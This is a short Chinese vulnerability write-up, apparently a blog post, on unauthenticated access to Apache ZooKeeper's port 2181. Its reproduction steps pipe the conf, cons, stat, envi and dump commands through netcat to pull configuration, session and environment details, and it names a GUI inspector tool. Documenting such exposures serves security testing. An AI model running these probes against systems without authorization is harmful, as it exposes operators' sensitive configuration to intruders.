漏洞简介
ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。它是一个为分布式应用提供一致性服务的软件,提供的功能包括:配置维护、域名服务、分布式同步、组服务等。
ZooKeeper默认开启在2181端口,在未进行任何访问控制情况下,攻击者可通过执行envi命令获得系统大量的敏感信息,包括系统名称、Java环境。
漏洞复现
1、获取信息-conf命令
// conf参数:输出相关服务配置的详细信息,端口、数据路径、日志路径、session 超时时间,最大连接数等。
echo conf | nc ip 2181
image.png
2、获取信息-cons命令
// 列出所有连接到当前服务器的客户端/会话的详细信息。
echo cons | nc ip 2181
image.png
3、获取信息-stat命令
// 列出关于性能和连接的客户端的统计信息
echo stat | nc ip 2181
image.png
4、获取信息-envi命令
// 打印有关服务环境的详细信息
echo envi | nc ip 2181
image.png
5、获取信息-dump命令
// 输出未处理的会话和临时节点,leader 节点有效
echo dump | nc ip 2181
image.png
6、可视化工具连接
工具下载链接:https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip
第二步添加ip
第三步添加SessionTracker,上述dump命令可获取到
image.png
image.png
网友评论